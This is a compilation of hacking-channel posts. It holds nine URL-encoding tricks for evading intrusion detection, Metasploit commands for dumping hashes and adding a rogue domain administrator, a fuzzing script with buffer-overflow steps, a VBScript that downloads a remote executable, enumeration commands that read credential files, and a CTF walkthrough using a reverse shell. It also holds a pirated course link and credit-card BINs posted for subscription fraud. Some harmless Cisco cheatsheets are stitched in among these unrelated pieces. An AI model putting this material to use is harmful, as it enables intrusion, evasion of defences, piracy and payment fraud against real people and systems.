▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑practical methods to break through IDS intrusion detection system :

There are many kinds of polymorphic URL encoding technologies, and the author here introduces 9 commonly used and representative methods. For the convenience of explanation, here is the URL with the submission address /msadc/msadcs.dll as an example. "/Msadc/msadcs.dll" has been collected in snort and other major IDS rule set files, so when we directly submit /msadc/msadcs.dll to the target machine, it will be intercepted and alarmed by IDS.

The first trick: "/./" string insertion method

In view of the special role of "./", we can insert it into the URL to achieve URL transformation. For example, for /msadc/msadcs.dll, we can rewrite it as /././msadc/././msadcs.dll, /./msadc/.//./msadcs.dll and other forms to disrupt IDS The identification mark analysis engine realizes the purpose of deceiving IDS. Moreover, the URL after the rewrite is equivalent to the unmodified URL. The author has shown through experiments that this method can bypass IDS such as Snort.

The second trick: "00" ASCII code

Some time ago, the Internet upload vulnerability was used to exploit this feature, and everyone must be familiar with it. Its principle is that when the computer processes the string, it automatically truncates at the ASCII code 00. We can rewrite /msadc/msadcs.dll to /msadc/msadcs.dll Iloveheikefangxian, use Winhex to change the space between .dll and Ilove to the ASCII code of 00, save it, and then submit it with NC and pipe. In this way, in the view of some IDS, the /msadc/msadcs.dll Iloveheikefangxian is not the same as the string of attack intent specified in its rule set file, so it will be indifferent to the behavior of the attacker. Look! How extensive is the application of the principle of "automatically truncating at ASCII code 00 when the computer processes a string"! Philosophically speaking, things are connected with each other, we should think more and dig out the internal laws, so There will be new discoveries.

The third trick: use the path separator "\"

For web servers like Microsoft's IIS, "\" can also be used as a path separator like "/". Some IDS did not consider the non-standard path separator "\" when setting the rule set file. If we rewrite /msadc/msadcs.dll to \msadc\ msadcs.dll, we can escape snort, because there is no identification mark of \msadc\ msadcs.dll in the snort rule set file. It is worth mentioning that the path separator "\" also has a magical effect, which is the "%5c" violent library method mentioned in the "Hacker Line of Defense" some time ago. "%5c" is the hexadecimal representation of "\".

Fourth trick: hexadecimal encoding

For a character, we can use the escape symbol "%" plus its hexadecimal ASCII code to represent it. For example, the first character "/" in /msadc/msadcs.dll can be expressed as %2F, and the following characters can be expressed by their corresponding hexadecimal ASCII code combined with "%". The URL encoded by this method It is no longer the original appearance. There may be no encoded string in the IDS rule set file, so IDS can be bypassed. But this method is invalid for IDS that uses HTTP preprocessing technology.

The fifth trick. Illegal Unicode encoding

UTF-8 encoding allows the character set to contain more than 256 characters, so it also allows more than 8 bits of encoding. The hexadecimal ASCII code of the "/" character is 2F, and the binary number is 00101111. The standard method for representing 2F in UTF-8 format is still 2F, but multi-byte UTF-8 can also be used to represent 2F. The character "/" can be represented by single-byte, double-byte, and three-byte UTF-8 encoding as shown in the following table:

"/" character representation binary hexadecimal

Single byte 0xxxxxxx 00101111 2F

Double byte 110xxxxx 10xxxxxx 11000000 10101111 C0 AF

Three bytes 1110xxxx 10xxxxxx 10xxxxxx 11100000 10000000 10101111 E0 80 AF

According to this method, we can encode the entire string accordingly. Although the resources that the encoded URLs ultimately point to are all the same, their expressions are different, and the filter string may not exist in the IDS rule set file, thus achieving the goal of breaking IDS.

Sixth trick: redundant coding method

The redundant coding is also called double decoding. I still remember that the Unicode decoding vulnerabilities and the double decoding vulnerabilities of IIS in 2000-2001 were making a lot of noise. At that time, many friends were confused and thought that the Unicode decoding vulnerabilities were double decoding vulnerabilities. In fact, the two of them are two different things. Is described in "Illegal Unicode Encoding". The redundant encoding refers to encoding a character multiple times. For example, the "/" character can be represented by %2f, and the "%", "2", and "f" characters in "%2f" can be represented by its ASCII code hexadecimal, according to the mathematical According to the knowledge of permutation and combination, the encoding form is 2 to the 3rd power, so "%2f" can be rewritten as: "%25%32%66", "%252f", etc. to realize the polymorphism of the URL. After encoding, The string may not be collected in the IDS rule set file, which can fool some IDS.

Seventh trick. Add false paths

After adding the string "../" to the URL, the directory after the string has no meaning and becomes invalid. Therefore, using the "../" character string can disrupt the identification mark analysis engine and break through the IDS!

Eighth trick: insert multiple slashes

We can use multiple "/" instead of a single "/". The replaced URL will still work as before. For example, the request for /msadc/msadcs.dll can be changed to ////msadc////msadcs.dll. After the author has experimented, this method can bypass some IDS.

Ninth trick: Comprehensive polymorphic coding

Smart, you will know when you read this subtitle. The so-called synthesis is to combine the several polymorphic coding techniques introduced above. In this way, the effect will be better. I hope this article will learn from you

enjoy❤️👍🏻
written by
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Nine practical methods to break through IDS intrusion detection system

🦑Cinema 4D Crash Course - Design a Six Pack Case -4.42 GB-

https://www.skillshare.com/classes/Cinema-4D-Crash-Course-Design-a-Six-Pack-Case/479623344

https://mega.nz/#F!VbQCRSRZ!EHyHwr2I67CFpplwBRFyiw

/▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑2020 Updated Linux :

> Its a framework filled with alot of options and hacking tools you use directly in the script from brute forcing to payload making. Im still trying to think of what to add to the script. I now have another tool out called htkl-lite its hackers-tool-kit just not as big and messy. To see updates check on my instagram unkn0wn or if there are any problems message me on instagram.

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1️⃣git clone https://github.com/unkn0wnh4ckr/hackers-tool-kit

2️⃣cd hackers-tool-kit

3️⃣python install.py

Run
4️⃣ROOT IS NOT REQUIRED TO RUN BUT IS RECOMMENDED

5️⃣cd hackers-tool-kit

6️⃣python htk.py

Then choose option

7️⃣the htksecure.py file will run the hackers-tool-kit with proxychains and other tools making you anonymous when hacking but some stuff might be slow or not work... to run htk secure look below

cd hackers-tool-kit

python htksecure.py

🦑Tested On:

> debian

> Undercode Linux

enjoy❤️👍🏻
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 DomainAdminExploitation :

After compromising a Windows machine:

[>] List the domain administrators:
From Shell - net group "Domain Admins" /domain

[>] Dump the hashes (Metasploit)
msf > run post/windows/gather/smart_hashdump GETSYSTEM=FALSE

[>] Find the admins (Metasploit)
spool /tmp/enumdomainusers.txt
msf > use auxiliary/scanner/smb/smb_enumusers_domain
msf > set smbuser Administrator
msf > set smbpass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
msf > set rhosts 10.10.10.0/24
msf > set threads 8
msf > run

msf> spool off

[>] Compromise Admin's box
meterpreter > load incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token MYDOM\\adaministrator
meterpreter > getuid
meterpreter > shell

C:\> whoami
mydom\adaministrator
C:\> net user hacker /add /domain
C:\> net group "Domain Admins" hacker /add /domain


enjoy❤️👍🏻
✅git topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑ExploitDev :

 Development Cheatsheet
------------------------------

[+] Fuzzing:

import socket

buffer = ["A"]
counter = 50

while len(buffer) <= 1000:
    buffer.append("A" * counter)
    counter = counter + 50

for buffstring in buffer:
    print "Fuzzing:" + str(len(buffstring))
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect( ("192.168.0.20", 5555) )
    sock.send(buffstring)
    sock.close()
  

[+] Bad Character Testing:

"\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e"
"\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d"
"\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c"
"\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b"
"\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a"
"\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59"
"\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68"
"\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77"
"\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86"
"\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95"
"\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4"
"\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3"
"\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2"
"\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1"
"\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef"
"\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe"
"\xff"


[+] Structured Exception Handler (SEH) Exploitation notes

- Crash the application
- Check SEH overwirte (view-seh chain)
- Find offset (!mona pattern_create <length>)
- Find certain SEH references to the cyclic pattern (!mona findmsp)
- Verify offset to NSEH (Next Exception)
- Find POP/POP/RET address with mona (!mona seh -cpb <bad chars>)
- Add short jump into payload to jump ofver SEH ("\xeb\x06" + 2 bytes of padding)
- Add shellcode to the payload
- Ensure existing padding to make sure the crash still happens.

enjoy❤️👍🏻
✅git topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Cisco IOS Command Line Cheatsheet

--- Verify Basic Configuration:

Shows information about the switch and its interfaces, RAM, NVRAM, flash, IOS, etc.
SW1# show version

Shows the current configuration file stored in DRAM.
SW1# show running-config

Shows the configuration file stored in NVRAM which is used at first boot process.
SW1# show startup-config

Lists the commands currently held in the history buffer.
SW1# show history

Shows an overview of all interfaces, their physical status, protocol status and ip address if assigned.
SW1# show ip interface brief

Shows detailed information about the specified interface, its status, protocol, duplex, speed, encapsulation, last 5 min traffic.
SW1# show interface vlan 1

Shows the description of all interfaces
SW1# show interfaces description

Shows the status of all interfaces like connected or not, speed, duplex, trunk or access vlan.
SW1# show interfaces status

Shows the public encryption key used for SSH.
SW1# show crypto key mypubkey rsa

Shows information about the leased IP address (when an interface is configured to get IP address via a dhcp server)
SW1# show dhcp lease

Show the router's routing table. List of all networks that the router can reach.
Router# show ip route

--- Router Modes:

Router>: User mode = Limited to basic monitoring commands
Router#: Privileged mode (exec-level mode) = Provides access to all other router commands
Router(config)#: global configuration mode = Commands that affect the entire system
Router(config-if)#: interface mode = Commands that affect interfaces
Router(config-subif)#: subinterface mode = Commands that affect subinterfaces
Router(config-line)#: line mode = Commands that affect in lines modes (console, vty, aux…)
Router(config-router)#: router configuration mode

--- Changing switch hostname:

Switch(config)# hostname SW1

--- Configuring passwords:

SW1(config)# enable secret cisco ! MD5 hash
SW1(config)# enable password notcisco ! Clear text

--- Securing console port:

SW1(config)# line con 0
SW1(config-line)# password cisco
SW1(config-line)# login

--- Securing terminal lines:

SW1(config)# line vty 0 4
SW1(config-line)# password cisco
SW1(config-line)# login

--- Encrypting passwords:

SW1(config)# service password-encryption

--- Configuring banners:

SW1(config)# banner motd $

enjoy❤️👍🏻
✅git topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑UNAUTHORIZED ACCESS IS PROHIBITED
for CiscoIOS
#fastTips

--- Giving the switch an IP address:

SW1(config)# interface vlan 1
SW1(config-if)# ip address 172.16.1.11 255.255.255.0 ! or DHCP
SW1(config-if)# no shutdown

--- Setting the default gateway:

SW1(config)# ip default-gateway 172.16.1.1

--- Saving configuration:

SW1# copy running-config startup-config
Destination filename startup-config? ! Press enter to confirm file name.
Building configuration…
OK

! Short for write memory.
SW1# wr
Building configuration…
OK

enjoy❤️👍🏻
✅git topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑FileUpload_Download_Transfer :

File Transfers

- Post exploitation refers to the actions performed by an attacker,
once some level of control has been gained on his target.

- Simple Local Web Servers

- Run a basic http server, great for serving up shells etc
python -m SimpleHTTPServer 80

- Run a basic Python3 http server, great for serving up shells
etc
python3 -m http.server

- Run a ruby webrick basic http server
ruby -rwebrick -e "WEBrick::HTTPServer.new
(:Port => 80, :DocumentRoot => Dir.pwd).start"

- Run a basic PHP http server
php -S $ip:80

- Creating a wget VB Script on Windows:
*https://github.com/erik1o6/oscp/blob/master/wget-vbs-win.txt*

- Windows file transfer script that can be pasted to the command line. File transfers to a Windows machine can be tricky without a Meterpreter shell. The following script can be copied and pasted into a basic windows reverse and used to transfer files from a web server (the timeout 1 commands are required after each new line):

echo Set args = Wscript.Arguments >> webdl.vbs
timeout 1
echo Url = "http://1.1.1.1/windows-privesc-check2.exe" >> webdl.vbs
timeout 1
echo dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") >> webdl.vbs
timeout 1
echo dim bStrm: Set bStrm = createobject("Adodb.Stream") >> webdl.vbs
timeout 1
echo xHttp.Open "GET", Url, False >> webdl.vbs
timeout 1
echo xHttp.Send >> webdl.vbs
timeout 1
echo with bStrm >> webdl.vbs
timeout 1
echo .type = 1 ' >> webdl.vbs
timeout 1
echo .open >> webdl.vbs
timeout 1


enjoy❤️👍🏻
✅git topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

cracking Excel

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Unix Based Hosts:
#commands

hostname
whoami
uname -a
cat /etc/lsb-release
dmesg | grep Linux
cat /etc/passwd
cat /etc/sudoers
netstat -antup
ps -aux
ps aux | grep root
crontab -l
/sbin/ifconfig -a
iptables -L
arp -e
cat ~/.bashhistory
cat ~/.ssh/authorizedkeys
mount

- Check installed applications
- Check installed compilers/interpreters

enjoy❤️👍🏻
✅git topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Born2Root: 2: Vulnhub Walkthrough

-Penetrating Methodology
-Scanning
-Enumeration
-Exploitation
-Privilege Escalation
-Capture the Flag
-Walkthrough

1) Let’s start off with scanning the network to find our target.

netdiscover

2) We found out target: 192.168.1.9

Time to scan the Target’s IP with nmap. Nmap scan result shows

3) major ports open, 22(SSH), 88(HTTP) and 111(RPC).

nmap -A 192.168.1.9

4) Since port 80 is running HTTP, so we considered opening the Target IP Address on the Browser. This gives us an attractive looking webpage although after spending a considerable amount of time. We found that this is nothing but a distraction. We couldn’t find anything of importance on the website.

> So now we moved on to try the Directory Bruteforcing to get any hints. The drib scan gives us the Joomla directory. This is a major breakthrough. Now it’s time to exploit machine through Joomla.

> dirb http://192.168.1.9/

5) Now that we have found the joomla directory, we will browse the joomla directory on our browser. Here we have the blog made by the author. This is titled Tim’s Blog. This could be a hint for a username. Let’s keep that in mind. Now as we can see that we have a Login Form in the bottom right. Now we will have to guess the user credentials.

6) Now, it is by convention to try the default credentials first. A quick search, informs us that the default username for Joomla is ‘admin’. Now for the password, we will have to perform a dictionary attack. For that, we will create a dictionary from the words present on the webpage using ‘cewl’.

> cewl http://192.168.1.9/joomla/ > dict.txt

7) Now that we have the dictionary named dict.txt. Its time to perform the bruteforce. We will use the BurpSuite to perform the bruteforce. To learn more about this, refer to this article. This bruteforce force gives us “travel” as the password.


> Now we will use these credentials to login in Joomla:

Username: admin
Password: travel

8) Now that we have logged in on the Joomla as the SuperUser. To exploit the Joomla server, we will use the php reverse shell. They can be found in Kali Linux. We will move on to the Template Section. To do so, we will first click on the Extensions Option on the Menu. Then, traverse in the beez3 template and choose Customise. This is open an edit section as shown in the image. Now, select the index.php and replace the text inside the index.php with our reverse shell. Remember to change the IP Address and/or change the port.

9) After editing the index.php, save the file by clicking on the Save Button. Now we have successfully replaced the index.php with our reverse shell script. Now, all that’s left to do is run the index.php. Now to get a session, we need a listener, where we will get our reverse shell. We will use netcat for creating a listener as shown in the image given below.

11) After we got the shell, now it was time to enumerate the ma
nc -lvp 1234
python -c 'import pty;pty.spawn("/bin/bash")'
cd /opt
ls
cd scripts
ls
cat fileshare.py

After finding the credentials all that was left was to login as Tim. For that we used the su command and gave the following credentials:

Username: tim
Password: lulzlol

12) After logging in as Tim, we ran the sudo with -l parameter to give us the user rights of the user tim. As we can see in the given image, tim has all the permissions. After this, we traversed inside the root directory using the cd command. Here we found the final flag.

su tim
sudo -l
sudo su
cd /root
ls
cat flag.txt

enjoy❤️👍🏻
✅git topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑SOME VERIFIED BINS :

> Bin spotify

531443331xxxxxxxx
ip: Netherlands
Change Payment to Egypt
https://namso-gen.com/

> Bin Disney Plus

Bin: 6501597230xxxxxxx
Fecha: Rnd
Cvv: Rnd
Ip: USA🇺🇸
Zip Code: 10001/10080


USE FOR LEARN

 VERIFIED BY US

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁